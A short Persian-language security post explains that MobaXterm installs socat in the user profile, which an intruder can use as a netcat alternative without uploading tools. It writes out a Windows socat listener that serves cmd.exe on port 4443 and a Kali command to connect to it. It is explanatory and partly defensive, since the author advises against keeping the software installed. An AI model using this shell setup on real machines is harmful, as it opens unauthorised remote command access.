سلام و عرض ادب خدمت دوستان گرامی

یکی از روش های دسترسی به سیستم هدف و Reverse، استفاده از ابزارهایی مانند netcat هست

ابزار nc یا netcat اغلب توسط سیستم های امنیتی شناسایی می شه

ابزار دیگر که در حوزه red team هم استفاده می شه ابزار socat هست

نکته جالب اینجاست که اگر شما ابزار MobaXterm رو در سیستم داشته باشید به صورت پیش فرض با یک بار اجرای این ابزار بر روی سیستم، socat به همراه تمام DLL های مورد نیاز روی سیستم ایجاد می شوند و دقیقا اجازه ارتباط رو می دهد.

مسیر قرار گرفتن socat در آخرین نسخه ابزار MobaXterm که من نصب کردم به صورت زیر است (پروفایل کاربر):

C:\Users\test\AppData\Roaming\MobaXterm\slash\bin

به نظرم از این ابزار استفاده نشه بهتر هست چراکه با این موضوع فقط نیاز هست که نفوذگر بدونه این نرم افزار نصبه دیگه نیازی به انتقال فایل بر روی سیستم قربانی نداره

دستور ایجاد کانکش جهت تست هم به شکل زیر هست:

Windows:
socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes

Kali:
socat - TCP4:192.168.66.132:4443